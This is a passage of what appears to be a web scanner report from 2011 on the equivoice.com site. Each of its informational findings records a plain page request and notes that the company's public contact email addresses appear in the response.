Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:40:03 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Fri, 05 Jun 2009 15:58:19 GMT
ETag: "108fa-5434-46b9bf60d1cc0"
Accept-Ranges: bytes
Content-Length: 21556
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:support@equivoice.com">support@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.9. http://www.equivoice.com/newsletter.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /newsletter.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /newsletter.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:40:04 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Tue, 02 Dec 2008 22:29:29 GMT
ETag: "108fe-4e18-45d17dc548440"
Accept-Ranges: bytes
Content-Length: 19992
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:support@equivoice.com">support@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.10. http://www.equivoice.com/privacy_policy.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /privacy_policy.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy_policy.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:40:05 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Fri, 05 Jun 2009 15:57:33 GMT
ETag: "10900-287c-46b9bf34f3540"
Accept-Ranges: bytes
Content-Length: 10364
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.11. http://www.equivoice.com/products/EquiTREX.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /products/EquiTREX.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /products/EquiTREX.htm HTTP/1.1
Host: www.equivoice.com
Proxy-Connection: keep-alive
Referer: http://www.equivoice.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.1.10.1297352306

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:38:44 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Tue, 02 Dec 2008 22:40:24 GMT
ETag: "108c9-2147-45d18035f0600"
Accept-Ranges: bytes
Content-Length: 8519
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<A HREF="mailto:info@equivoice.com">info@equivoice.com</A>
...[SNIP]...

4.12. http://www.equivoice.com/products/IP_telephony.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /products/IP_telephony.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /products/IP_telephony.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:39:18 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Fri, 05 Jun 2009 20:12:32 GMT
ETag: "108cc-5789-46b9f83336c00"
Accept-Ranges: bytes
Content-Length: 22409
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.13. http://www.equivoice.com/products/call_center.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /products/call_center.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /products/call_center.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:39:33 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Fri, 05 Jun 2009 20:17:30 GMT
ETag: "107db-60c5-46b9f94f68a80"
Accept-Ranges: bytes
Content-Length: 24773
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.14. http://www.equivoice.com/products/cisco_colo_connect.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /products/cisco_colo_connect.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /products/cisco_colo_connect.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:39:23 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Fri, 05 Jun 2009 20:17:14 GMT
ETag: "107dc-2fd9-46b9f94026680"
Accept-Ranges: bytes
Content-Length: 12249
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.15. http://www.equivoice.com/products/equi-conferencing.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /products/equi-conferencing.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /products/equi-conferencing.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:39:21 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Tue, 02 Dec 2008 22:40:23 GMT
ETag: "107dd-2bde-45d18034fc3c0"
Accept-Ranges: bytes
Content-Length: 11230
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<A HREF="mailto:info@equivoice.com">info@equivoice.com</A>
...[SNIP]...

4.16. http://www.equivoice.com/products/equi-t1.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /products/equi-t1.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /products/equi-t1.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:39:47 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Tue, 02 Dec 2008 22:40:23 GMT
ETag: "107e1-1798-45d18034fc3c0"
Accept-Ranges: bytes
Content-Length: 6040
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<A HREF="mailto:info@equivoice.com">info@equivoice.com</A>
...[SNIP]...

4.17. http://www.equivoice.com/products/equi-voip.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /products/equi-voip.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /products/equi-voip.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:39:46 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Tue, 02 Dec 2008 22:40:23 GMT
ETag: "107f9-1852-45d18034fc3c0"
Accept-Ranges: bytes
Content-Length: 6226
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<A HREF="mailto:info@equivoice.com">info@equivoice.com</A>
...[SNIP]...

4.18. http://www.equivoice.com/products/equi_messaging.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /products/equi_messaging.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /products/equi_messaging.htm HTTP/1.1
Host: www.equivoice.com
Proxy-Connection: keep-alive
Referer: http://www.equivoice.com/products/EquiTREX.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.2.10.1297352306

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:38:48 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Fri, 05 Jun 2009 20:14:28 GMT
ETag: "108c3-274f-46b9f8a1d7100"
Accept-Ranges: bytes
Content-Length: 10063
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.19. http://www.equivoice.com/products/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /products/index.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /products/index.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:39:14 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Wed, 22 Jul 2009 16:29:00 GMT
ETag: "108ca-5a38-46f4dde532b00"
Accept-Ranges: bytes
Content-Length: 23096
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.20. http://www.equivoice.com/products/ip_phone_models.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /products/ip_phone_models.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /products/ip_phone_models.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:39:21 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Tue, 02 Dec 2008 22:40:24 GMT
ETag: "108cb-673d-45d18035f0600"
Accept-Ranges: bytes
Content-Length: 26429
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<A HREF="mailto:info@equivoice.com">info@equivoice.com</A>
...[SNIP]...

4.21. http://www.equivoice.com/products/moving.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /products/moving.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /products/moving.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:39:38 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Fri, 05 Jun 2009 20:11:35 GMT
ETag: "108ce-644f-46b9f7fcdabc0"
Accept-Ranges: bytes
Content-Length: 25679
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.22. http://www.equivoice.com/products/standalone_callManager.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /products/standalone_callManager.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /products/standalone_callManager.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:39:59 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Fri, 05 Jun 2009 20:08:05 GMT
ETag: "108cf-2b7c-46b9f73495340"
Accept-Ranges: bytes
Content-Length: 11132
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.23. http://www.equivoice.com/products/telephone_systems.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /products/telephone_systems.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /products/telephone_systems.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:39:18 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Fri, 05 Jun 2009 20:07:31 GMT
ETag: "108d0-2b7e-46b9f714286c0"
Accept-Ranges: bytes
Content-Length: 11134
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.24. http://www.equivoice.com/products/updating.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /products/updating.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /products/updating.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:39:40 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Fri, 05 Jun 2009 20:06:57 GMT
ETag: "108d1-5f93-46b9f6f3bba40"
Accept-Ranges: bytes
Content-Length: 24467
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.25. http://www.equivoice.com/rso_article.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /rso_article.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /rso_article.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:40:04 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Fri, 05 Jun 2009 15:56:02 GMT
ETag: "10901-8655-46b9bede2a880"
Accept-Ranges: bytes
Content-Length: 34389
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:support@equivoice.com">support@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.26. http://www.equivoice.com/solutions/IP_telephony.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /solutions/IP_telephony.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /solutions/IP_telephony.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:40:02 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Tue, 02 Dec 2008 22:33:26 GMT
ETag: "108d8-16d6-45d17ea74d980"
Accept-Ranges: bytes
Content-Length: 5846
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<A HREF="mailto:info@equivoice.com">info@equivoice.com</A>
...[SNIP]...

4.27. http://www.equivoice.com/solutions/SOHO_solutions.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /solutions/SOHO_solutions.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /solutions/SOHO_solutions.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:40:02 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Fri, 05 Jun 2009 19:59:09 GMT
ETag: "108dc-47b6-46b9f53569d40"
Accept-Ranges: bytes
Content-Length: 18358
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.28. http://www.equivoice.com/solutions/call_center.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /solutions/call_center.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /solutions/call_center.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:40:02 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Tue, 02 Dec 2008 22:33:26 GMT
ETag: "107ec-2196-45d17ea74d980"
Accept-Ranges: bytes
Content-Length: 8598
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<A HREF="mailto:info@equivoice.com">info@equivoice.com</A>
...[SNIP]...

4.29. http://www.equivoice.com/solutions/connectivity_options.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /solutions/connectivity_options.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /solutions/connectivity_options.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:40:01 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Fri, 05 Jun 2009 20:05:00 GMT
ETag: "107ee-62bc-46b9f68427300"
Accept-Ranges: bytes
Content-Length: 25276
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
